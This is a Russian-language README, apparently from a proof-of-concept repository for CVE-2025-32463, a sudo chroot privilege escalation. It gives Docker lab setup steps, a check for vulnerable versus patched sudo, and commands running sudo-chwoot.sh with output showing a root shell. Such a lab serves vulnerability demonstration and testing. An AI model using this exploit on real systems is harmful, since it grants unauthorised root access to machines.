
Эскалация привилегий до root через бинарный файл sudo с опцией chroot. CVE-2025-32463
Этот репозиторий предоставляет минимальную воспроизводимую среду для демонстрации уязвимости повышения привилегий CVE‑2025‑32463 в функции chroot в sudo.
Уязвимые сборки sudo 1.9.14 вплоть до 1.9.17 (все p‑revisions) на большинстве дистрибутивов Linux подвержены уязвимости.
Страницы безопасности
| Файл | Назначение |
|---|---|
| Dockerfile | Создаёт образ Ubuntu 24.04 с уязвимым sudo 1.9.16p2 и инструментами сборки |
| sudo‑chwoot.sh | Эксплойт Proof‑of‑Concept, открывающий root-оболочку внутри chroot |
| run.sh |
# Уязвимый sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Исправленный sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – клонируем репозиторий
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – собираем и запускаем Docker-образ (с тегом "sudo-chwoot")
$ ./run.sh
# 3 – запускаем эксплойт в контейнере (выполняет команду от root или открывает root-оболочку)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh передаёт Docker параметры --privileged и --rm, чтобы контейнер автоматически удалялся при выходе.
Удалите образ, когда закончите:
docker rmi sudo-chwoot
| Вспомогательный скрипт, собирающий образ (при необходимости) и запускающий контейнер с эксплойтом |